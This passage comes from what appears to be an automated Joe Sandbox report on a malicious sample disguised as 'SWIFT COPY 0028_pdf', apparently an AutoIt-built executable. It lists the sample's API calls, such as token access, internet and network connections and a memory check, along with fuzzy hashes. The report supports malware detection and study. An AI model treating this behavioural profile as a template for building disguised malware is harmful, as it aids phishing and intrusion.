                                                                                    • GetCurrentThread.KERNEL32 ref: 0095B0D6
                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0095AC9D), ref: 0095B0DD
                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0095AC9D), ref: 0095B0EA
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0095AC9D), ref: 0095B0F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                    • String ID:
                                                                                    • API String ID: 3974789173-0
                                                                                    • Opcode ID: 3f8bd89967080b2202f83162e7df7be0c2bcb97c68d0d26c8100e834975b005c
                                                                                    • Instruction ID: decc88784988125051f473016d67b35a3dfbc21fae34bafe6a1934afa339821d
                                                                                    • Opcode Fuzzy Hash: 3f8bd89967080b2202f83162e7df7be0c2bcb97c68d0d26c8100e834975b005c
                                                                                    • Instruction Fuzzy Hash: 70E08672616221ABDB205FB25C0DB473BACEF56796F028818F743D6080DB348406D7A0
                                                                                    APIs
                                                                                    • GetSysColor.USER32(00000008), ref: 0093B496
                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0093B4A0
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0093B4B5
                                                                                    • GetStockObject.GDI32(00000005), ref: 0093B4BD
                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0099DE2B
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0099DE38
                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0099DE51
                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0099DE6A
                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0099DE8A
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0099DE95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1946975507-0
                                                                                    • Opcode ID: 6d92f1fd594f178715f626392fc6ecd64fef426cfbd8b9622599222055c78de4
                                                                                    • Instruction ID: f67973205e0e124be52f0b1ab209572f3139668136c028f70058ed975ede077f
                                                                                    • Opcode Fuzzy Hash: 6d92f1fd594f178715f626392fc6ecd64fef426cfbd8b9622599222055c78de4
                                                                                    • Instruction Fuzzy Hash: 7DE06D31519240AEEF251F68AC4DBD83B15AF13339F00C226F66A584E1C3714581EB51
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2889604237-0
                                                                                    • Opcode ID: cee5734f240a7aa6a0bd7545e261dcc1fded4154aa4e585755f7e453de3fafb5
                                                                                    • Instruction ID: 4a3cfffcf7664d3c05dbad775a8b8d7c29d6c36c12c97f03df0e3c34f5dad2dd
                                                                                    • Opcode Fuzzy Hash: cee5734f240a7aa6a0bd7545e261dcc1fded4154aa4e585755f7e453de3fafb5
                                                                                    • Instruction Fuzzy Hash: 82E046B1515204EFDB005F70D848A2E7BA9EF4D350F12C80AFC9B8B610CB789840AF80
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0095B2DF
                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0095B2EB
                                                                                    • CloseHandle.KERNEL32(?), ref: 0095B2F4
                                                                                    • CloseHandle.KERNEL32(?), ref: 0095B2FC
                                                                                      • Part of subcall function 0095AB24: GetProcessHeap.KERNEL32(00000000,?,0095A848), ref: 0095AB2B
                                                                                      • Part of subcall function 0095AB24: HeapFree.KERNEL32(00000000), ref: 0095AB32
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                    • String ID:
                                                                                    • API String ID: 146765662-0
                                                                                    • Opcode ID: e43f5526aebb628b7ccb653e79310809da3313843ebea3a779223b768d08eb94
                                                                                    • Instruction ID: ba571c117512083dbf6849a61c36c709af96ba0fd4122a0611cf9eaa9ab69c0c
                                                                                    • Opcode Fuzzy Hash: e43f5526aebb628b7ccb653e79310809da3313843ebea3a779223b768d08eb94
                                                                                    • Instruction Fuzzy Hash: B2E0BF7A119005BBCB016B95EC0885DFB66FF893213108221F62681975CF329471FBD1

APIs
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 8c64107e05cff75d45bc74849fdae1df8cf287b4e8e1df0c741be3a57fcfbc80
• Instruction ID: c400c4ff2bbf3f30e1bfb7c96b54316e756f9abb772050ceb175052dea649488
• Opcode Fuzzy Hash: 8c64107e05cff75d45bc74849fdae1df8cf287b4e8e1df0c741be3a57fcfbc80
• Instruction Fuzzy Hash: ABE046B1515200EFDB005F70D84862D7BA9EF4D350F12C809F99B8B610CB789800AF80

APIs
• OleSetContainedObject.OLE32(?,00000001), ref: 0095DEAA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ContainedObject
• String ID: AutoIt3GUI$Container
• API String ID: 3565006973-3941886329
• Opcode ID: 63315f148fee053dad77a5cf4f847e2da3d0a267fdca089f6a2ce5847dafab9d
• Instruction ID: 3b58feb04f87450e29057b91e0c26bc919e722502adad5c40b83bfe696e06901
• Opcode Fuzzy Hash: 63315f148fee053dad77a5cf4f847e2da3d0a267fdca089f6a2ce5847dafab9d
• Instruction Fuzzy Hash: 389137706017019FDB24CF65C888B6AB7F9AF89711F10886DFC4ACB691DB70E845CB60

APIs
  • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
  • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
  • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
• __wcsnicmp.LIBCMT ref: 0096DEFD
• WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0096DFC6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
• String ID: LPT
• API String ID: 3222508074-1350329615
• Opcode ID: 9233980bdfd79be60cb889909f76f3046e532c1c67932de81e94363586bbdb1c
• Instruction ID: 5c6ca6df37903bf00a63a72b6980eb93510591789589d29574069944ac09354f
• Opcode Fuzzy Hash: 9233980bdfd79be60cb889909f76f3046e532c1c67932de81e94363586bbdb1c
• Instruction Fuzzy Hash: 2B61AE75E04215EFCB18DF98C891EAEB7B8EF48310F10406AF556AB291DB74AE40CB94

APIs
• Sleep.KERNEL32(00000000), ref: 0093BCDA
• GlobalMemoryStatusEx.KERNEL32 ref: 0093BCF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 32ac07a45e94aef7bab6d8feb8cfc5ccebd7c7ca51d9f7045422bdcbd94aeeeb
• Instruction ID: 1d84b53a69d26cbfe6956f5e079edd4721ea19b40ec244d2dfc73d0210c62e73
• Opcode Fuzzy Hash: 32ac07a45e94aef7bab6d8feb8cfc5ccebd7c7ca51d9f7045422bdcbd94aeeeb
• Instruction Fuzzy Hash: C45123714197489BE320AF14DC86BAFBBE8FFD5354F41484EF1C8410A6EB7085A89B56

APIs
  • Part of subcall function 009244ED: __fread_nolock.LIBCMT ref: 0092450B
• _wcscmp.LIBCMT ref: 0096C65D
• _wcscmp.LIBCMT ref: 0096C670
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
• API String ID: 4029003684-3121273764
• Opcode ID: 616860b94f35962ee57f1720b73c047cb7c81abf0b96e58455bf734cf71b9abe
• Instruction ID: ef710314ee8849abfbf36fa518c4f57a23a52ae1b86e194702d05f3883e23a68
• Opcode Fuzzy Hash: 616860b94f35962ee57f1720b73c047cb7c81abf0b96e58455bf734cf71b9abe
• Instruction Fuzzy Hash: 4441C472B0021ABADF20ABA4EC41FEF77B9AF89714F004479F605EB191D6719A048B61

APIs
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0098A85A
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0098A86F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: fcc05c68cb59fb3ee0e7702fa7fcaf083de1d7a91d3c7f8a1d5b680d129ce26f
• Instruction ID: 7757ca41435fc4770c61d83d1b7e925422212f739466c821f66fc6e288c0a428
• Opcode Fuzzy Hash: fcc05c68cb59fb3ee0e7702fa7fcaf083de1d7a91d3c7f8a1d5b680d129ce26f
• Instruction Fuzzy Hash: 2541F774E013099FEB14DFA8D881BDA7BB9FB08704F14006AE909EB341D774A942DFA1

APIs
• _memset.LIBCMT ref: 00975190
• InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009751C6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: CrackInternet_memset
• String ID: |
• API String ID: 1413715105-2343686810
• Opcode ID: 3b0bcb08d35a5720f338c8c4bb3f420a202802d3ae172c15b478be948db7a951
• Instruction ID: 7394a6cb7ab92dcbb4b3adae7a878e739691597f363629a02e82957425653118
• Opcode Fuzzy Hash: 3b0bcb08d35a5720f338c8c4bb3f420a202802d3ae172c15b478be948db7a951
• Instruction Fuzzy Hash: 9E313971C00119EBCF51EFA4DC85AEE7FB9FF54710F004015F915A616AEA71A906CBA0

APIs
• DestroyWindow.USER32(?,?,?,?), ref: 0098980E
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0098984A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: 108abedb1901e2faecb0aff916072ef97ed992e90a1f3f211fca8b4669b0e128
• Instruction ID: d7008e8acd09619a07dd7f95ab9b7310d15046394b1b4821e3b7a3e9f4cae19b
• Opcode Fuzzy Hash: 108abedb1901e2faecb0aff916072ef97ed992e90a1f3f211fca8b4669b0e128
• Instruction Fuzzy Hash: AE318F71110604AEEB10AF74CC80BFB73ADFF99764F048619F8A9C7290CA31AC81DB60

APIs
• _memset.LIBCMT ref: 009651C6
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00965201
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 21119d85d3c89e945d75a7f8539494bbe619f151d9df28f363264139e99f227a
• Instruction ID: dd7a0d35af80cf44c26719874061fda17352eebb05e911ad8f657c91a152e459
• Opcode Fuzzy Hash: 21119d85d3c89e945d75a7f8539494bbe619f151d9df28f363264139e99f227a
• Instruction Fuzzy Hash: E331F671A00704DBEB24CF99D895BAEBBFCFF85350F160019E9A5A61A0E7709A44DB10

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: __snwprintf
• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 2391506597-2584243854
• Opcode ID: d0bb106249916aae2fbac98230342359495509c32c5248a7825d85c72dd0618d
• Instruction ID: 3f3934a9ef68891aaf63eb5ae18c1ec887ad140400778497fcbfd5b0aa3c5226
• Opcode Fuzzy Hash: d0bb106249916aae2fbac98230342359495509c32c5248a7825d85c72dd0618d
• Instruction Fuzzy Hash: DA21E472A00229AFCF10EF64D882FED77B4AF84704F408469F505AB186DB70EE15CBA1
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0098945C
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00989467
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Combobox
                                                                                    • API String ID: 3850602802-2096851135
                                                                                    • Opcode ID: e8e53a409bc989c5eb57d3f398e4c49bc30fab140c953b9e62b35fc642689620
                                                                                    • Instruction ID: 3fc02d703ec4c5e15bbb81f14aa4fedc0fbbbcb2afb52eb1b6a06a5c22bff2fd
                                                                                    • Opcode Fuzzy Hash: e8e53a409bc989c5eb57d3f398e4c49bc30fab140c953b9e62b35fc642689620
                                                                                    • Instruction Fuzzy Hash: EB11B2713102197FEF11AF64DC80EBB376FEB883A4F144125F919973A0D6319C528B60
                                                                                    APIs
                                                                                      • Part of subcall function 0093D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                      • Part of subcall function 0093D17C: GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                      • Part of subcall function 0093D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00989968
                                                                                    • GetSysColor.USER32(00000012), ref: 00989982
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                    • String ID: static
                                                                                    • API String ID: 1983116058-2160076837
                                                                                    • Opcode ID: ece6da94a22bb5836f2256ac66ea88ca5895f0ee5084219a2be1b3ecfe71ae13
                                                                                    • Instruction ID: 93b70b34b3aa689661cbe3d0031aae8676ab32aeabca46fad83860ed8d1df690
                                                                                    • Opcode Fuzzy Hash: ece6da94a22bb5836f2256ac66ea88ca5895f0ee5084219a2be1b3ecfe71ae13
                                                                                    • Instruction Fuzzy Hash: 63113A72520209AFDB04EFB8CC45AFA7BA8FF49344F055619F956E3250D735E850DB50
                                                                                    APIs
                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00989699
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009896A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                    • String ID: edit
                                                                                    • API String ID: 2978978980-2167791130
                                                                                    • Opcode ID: fc735f2d89ca3260ebdf6360043e45e8ac3bde114259b50be55cd544887dfbcd
                                                                                    • Instruction ID: d7c7e71360d5153f869a1445886812ce4dd489e2dd72cfdb94d391e9c739635c
                                                                                    • Opcode Fuzzy Hash: fc735f2d89ca3260ebdf6360043e45e8ac3bde114259b50be55cd544887dfbcd
                                                                                    • Instruction Fuzzy Hash: C1119A71510108ABEB106FA4DC80AFB3B6EEB05378F140714F925972E0E735DC50ABA0
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 009652D5
                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009652F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoItemMenu_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 2223754486-4108050209
                                                                                    • Opcode ID: 9549e87721902a53367a691d40888ae2f3cf219fe987db9600b23f946d79fc91
                                                                                    • Instruction ID: 985bfeb3e13738e085884af1e0efd9c6d403ca3cddb3e113e1ddab9a2803cd70
                                                                                    • Opcode Fuzzy Hash: 9549e87721902a53367a691d40888ae2f3cf219fe987db9600b23f946d79fc91
                                                                                    • Instruction Fuzzy Hash: 2111EF76E01714EBDB20DF98D944F9D77BCAB06B94F060025E912EB2A0D3B0ED44CBA0
                                                                                    APIs
                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00974DF5
                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00974E1E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
